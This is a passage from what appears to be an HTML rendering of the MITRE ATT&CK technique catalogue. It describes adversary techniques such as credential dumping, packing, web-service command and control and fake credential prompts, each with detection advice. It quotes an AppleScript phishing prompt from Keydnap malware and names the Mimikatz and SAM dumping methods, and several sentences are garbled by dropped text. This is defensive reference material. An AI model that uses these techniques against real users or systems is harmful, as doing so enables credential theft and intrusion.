<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, API monitoring, DLL monitoring, Windows Registry, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 703. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1013">https://attack.mitre.org/wiki/Technique/T1013</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/dd183341">http://msdn.microsoft.com/en-us/library/dd183341</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf">https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_source"><a class="anchor" href="#_source"></a><a class="link" href="#_source">Source</a></h3>
<div class="paragraph">
<p>The &lt;code&gt;source&lt;/code&gt; command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways &lt;code&gt;source /path/to/filename [arguments]&lt;/code&gt; or &lt;code&gt;. /path/to/filename [arguments]&lt;/code&gt;. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell&#8217;s environment.</p>
</div>
<div class="paragraph">
<p>Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, File monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 704. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1153">https://attack.mitre.org/wiki/Technique/T1153</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_software_packing"><a class="anchor" href="#_software_packing"></a><a class="link" href="#_software_packing">Software Packing</a></h3>
<div class="paragraph">
<p>Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.</p>
</div>
<div class="paragraph">
<p>Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available,[[Citation: Wikipedia Exe Compression]] but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.</p>
</div>
<div class="paragraph">
<p>Detection: Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 705. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1045">https://attack.mitre.org/wiki/Technique/T1045</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://en.wikipedia.org/wiki/Executable%20compression">http://en.wikipedia.org/wiki/Executable%20compression</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_application_window_discovery"><a class="anchor" href="#_application_window_discovery"></a><a class="link" href="#_application_window_discovery">Application Window Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</p>
</div>
<div class="paragraph">
<p>In Mac, this can be done natively with a small AppleScript script.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 706. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1010">https://attack.mitre.org/wiki/Technique/T1010</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hypervisor"><a class="anchor" href="#_hypervisor"></a><a class="link" href="#_hypervisor">Hypervisor</a></h3>
<div class="paragraph">
<p>A type-1 hypervisor is a software layer that sits between the guest operating systems and system&#8217;s hardware.Rootkit functionality to hide its existence from the guest operating system.[[Citation: Myers 2007]] A malicious hypervisor of this nature could be used to persist on systems through interruption.</p>
</div>
<div class="paragraph">
<p>Detection: Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present.[[Citation: virtualization.info 2006]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: System calls</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 707. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1062">https://attack.mitre.org/wiki/Technique/T1062</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Hypervisor">https://en.wikipedia.org/wiki/Hypervisor</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&amp;rep=rep1&amp;type=pdf">http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&amp;rep=rep1&amp;type=pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://en.wikipedia.org/wiki/Xen">http://en.wikipedia.org/wiki/Xen</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html">http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_credential_dumping"><a class="anchor" href="#_credential_dumping"></a><a class="link" href="#_credential_dumping">Credential Dumping</a></h3>
<div class="paragraph">
<p>Credential dumping is the process of obtaining account login and password information from the operating system and software. Credentials can be used to perform Windows Credential Editor, Mimikatz, and gsecdump. These tools are in use by both professional security testers and adversaries.</p>
</div>
<div class="paragraph">
<p>Plaintext passwords can be obtained using tools such as Mimikatz to extract passwords stored by the Local Security Authority (LSA). If smart cards are used to authenticate to a domain using a personal identification number (PIN), then that PIN is also cached as a result and may be dumped.Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective DLL Injection to reduce potential indicators of malicious activity.</p>
</div>
<div class="paragraph">
<p>NTLM hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.</p>
</div>
<div class="paragraph">
<p>On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit&#8217;s Invoke-Mimikatz module,[[Citation: Powersploit]] which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring, PowerShell logs, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 708. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1003">https://attack.mitre.org/wiki/Technique/T1003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gentilkiwi/mimikatz/wiki/module-" class="bare">https://github.com/gentilkiwi/mimikatz/wiki/module-</a><sub>-sekurlsa[<a href="https://github.com/gentilkiwi/mimikatz/wiki/module-" class="bare">https://github.com/gentilkiwi/mimikatz/wiki/module-</a></sub>-sekurlsa]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_web_service"><a class="anchor" href="#_web_service"></a><a class="link" href="#_web_service">Web Service</a></h3>
<div class="paragraph">
<p>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.</p>
</div>
<div class="paragraph">
<p>Popular websites and social media can act as a mechanism for command and control and give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.</p>
</div>
<div class="paragraph">
<p>Detection: Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 709. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1102">https://attack.mitre.org/wiki/Technique/T1102</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_query_registry"><a class="anchor" href="#_query_registry"></a><a class="link" href="#_query_registry">Query Registry</a></h3>
<div class="paragraph">
<p>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.</p>
</div>
<div class="paragraph">
<p>The Registry contains a significant amount of information about the operating system, configuration, software, and security.Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 710. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1012">https://attack.mitre.org/wiki/Technique/T1012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Windows%20Registry">https://en.wikipedia.org/wiki/Windows%20Registry</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_third_party_software"><a class="anchor" href="#_third_party_software"></a><a class="link" href="#_third_party_software">Third-party Software</a></h3>
<div class="paragraph">
<p>Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.</p>
</div>
<div class="paragraph">
<p>Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.</p>
</div>
<div class="paragraph">
<p>The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.</p>
</div>
<div class="paragraph">
<p>Detection: Detection methods will vary depending on the type of third-party software or system and how it is typically used.</p>
</div>
<div class="paragraph">
<p>The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems.</p>
</div>
<div class="paragraph">
<p>Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious.</p>
</div>
<div class="paragraph">
<p>Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Third-party application logs, Windows Registry, Process monitoring, Process use of network, Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 711. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1072">https://attack.mitre.org/wiki/Technique/T1072</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_file_copy"><a class="anchor" href="#_remote_file_copy"></a><a class="link" href="#_remote_file_copy">Remote File Copy</a></h3>
<div class="paragraph">
<p>Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</p>
</div>
<div class="paragraph">
<p>Adversaries may also copy files laterally between internal victim systems to support Windows Admin Shares or Remote Desktop Protocol.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.</p>
</div>
<div class="paragraph">
<p>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 712. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1105">https://attack.mitre.org/wiki/Technique/T1105</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_system_logical_offsets"><a class="anchor" href="#_file_system_logical_offsets"></a><a class="link" href="#_file_system_logical_offsets">File System Logical Offsets</a></h3>
<div class="paragraph">
<p>Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools.PowerShell, additional logging of PowerShell scripts is recommended.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 713. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1006">https://attack.mitre.org/wiki/Technique/T1006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin">http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shared_webroot"><a class="anchor" href="#_shared_webroot"></a><a class="link" href="#_shared_webroot">Shared Webroot</a></h3>
<div class="paragraph">
<p>Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website&#8217;s webroot or Web content directory and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.</p>
</div>
<div class="paragraph">
<p>This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited.</p>
</div>
<div class="paragraph">
<p>Detection: Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 714. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1051">https://attack.mitre.org/wiki/Technique/T1051</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_indicator_blocking"><a class="anchor" href="#_indicator_blocking"></a><a class="link" href="#_indicator_blocking">Indicator Blocking</a></h3>
<div class="paragraph">
<p>An adversary may attempt to block indicators or events from leaving the host machine. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process or creating a host-based firewall rule to block traffic to a specific server.</p>
</div>
<div class="paragraph">
<p>Detection: Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.</p>
</div>
<div class="paragraph">
<p>Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Sensor health and status, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 715. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1054">https://attack.mitre.org/wiki/Technique/T1054</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_input_prompt"><a class="anchor" href="#_input_prompt"></a><a class="link" href="#_input_prompt">Input Prompt</a></h3>
<div class="paragraph">
<p>When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript:</p>
</div>
<div class="paragraph">
<p>&lt;code&gt;set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")&lt;/code&gt;
[[Citation: OSX Keydnap malware]]</p>
</div>
<div class="paragraph">
<p>Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.[[Citation: OSX Malware Exploits MacKeeper]]</p>
</div>
<div class="paragraph">
<p>Detection: This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to detect. Monitor process execution for unusual programs as well as AppleScript that could be used to prompt users for credentials.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: User interface, Process Monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 716. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1141">https://attack.mitre.org/wiki/Technique/T1141</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/">https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html">https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_physical_medium"><a class="anchor" href="#_exfiltration_over_physical_medium"></a><a class="link" href="#_exfiltration_over_physical_medium">Exfiltration Over Physical Medium</a></h3>
<div class="paragraph">
<p>In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file access on removable media. Detect processes that execute when removable media are mounted.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Data loss prevention, File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 717. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1052">https://attack.mitre.org/wiki/Technique/T1052</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_time_discovery"><a class="anchor" href="#_system_time_discovery"></a><a class="link" href="#_system_time_discovery">System Time Discovery</a></h3>
<div class="paragraph">
<p>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.Net on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim&#8217;s time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;.Scheduled Task[[Citation: RSA EU12 They&#8217;re Inside]], or to discover locality information based on time zone to assist in victim targeting.</p>
</div>
<div class="paragraph">
<p>Detection: Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters, API monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 718. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1124">https://attack.mitre.org/wiki/Technique/T1124</a></p></td>
</tr>
<tr>
